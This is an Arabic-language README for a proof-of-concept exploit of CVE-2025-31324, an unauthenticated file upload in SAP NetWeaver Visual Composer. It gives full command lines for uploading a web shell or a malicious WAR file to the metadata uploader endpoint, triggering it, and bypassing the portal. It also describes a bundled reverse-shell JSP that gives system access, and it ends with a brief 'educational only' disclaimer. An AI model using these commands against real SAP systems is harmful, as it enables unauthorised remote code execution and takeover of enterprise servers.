
إثبات المفهوم لثغرة CVE-2025-31324: رفع ملفات بدون مصادقة في SAP NetWeaver Visual Composer Metadata Uploader
إثبات المفهوم لـ CVE-2025-31324: رفع غير مصادق عليه في SAP NetWeaver Visual Composer Metadata Uploader
يقوم هذا السكربت بتنفيذ:
مثال للاستخدام:
python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal
python3 PoC.py --host sap.example.com --port 50000
--endpoint /developmentserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https
لديك أيضًا إمكانية رفع ملف .war إذا كانت هذه هي الطريقة التي تريد التنفيذ بها. cache.jsp عبارة عن شل عكسي سيمنحك وصولًا بمجرد الدخول إلى النظام. (ما زلت أعمل على حل بعض المشكلات هناك)
هذا مخصص للأغراض التعليمية فقط ويجب عدم استخدامه لأي أنشطة ضارة. تأكد دائمًا من حصولك على الأذونات اللازمة واتبع الإرشادات الأخلاقية عند اختبار أو البحث في الثغرات الأمنية.
لأي أسئلة أو توضيحات، لا تتردد في التواصل. ابقَ آمنًا ومحميًا!